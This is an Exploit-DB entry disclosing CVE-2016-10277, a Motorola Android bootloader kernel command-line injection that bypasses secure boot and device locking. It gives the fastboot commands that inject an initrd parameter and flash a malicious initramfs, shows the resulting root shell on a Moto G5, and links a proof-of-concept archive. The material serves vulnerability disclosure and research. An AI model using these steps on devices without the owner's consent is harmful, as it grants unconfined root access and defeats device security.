Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass

EDB-ID:

42601


Author:

Roee Hay

Type:

local


Platform:

Android

Date:

2017-09-01


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

Sources:
https://alephsecurity.com/2017/08/30/untethered-initroot/
https://github.com/alephsecurity/initroot

initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277)

By Roee Hay / Aleph Research, HCL Technologies

Recap of the Vulnerability and the Tethered-jailbreak

1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection.
2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address.
3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices).
4. Exploiting the vulnerability allows the adversary to gain unconfined root shell.
5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot.
For example, here is a successful run of the exploit on cedric (Moto G5)

$ fastboot oem config fsg-id "a initrd=0xA2100000,1588598" 
$ fastboot flash aleph initroot-cedric.cpio.gz 
$ fastboot continue

$ adb shell 
cedric:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
cedric:/ # getenforce
Permissive
cedric:/ #


Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42601.zip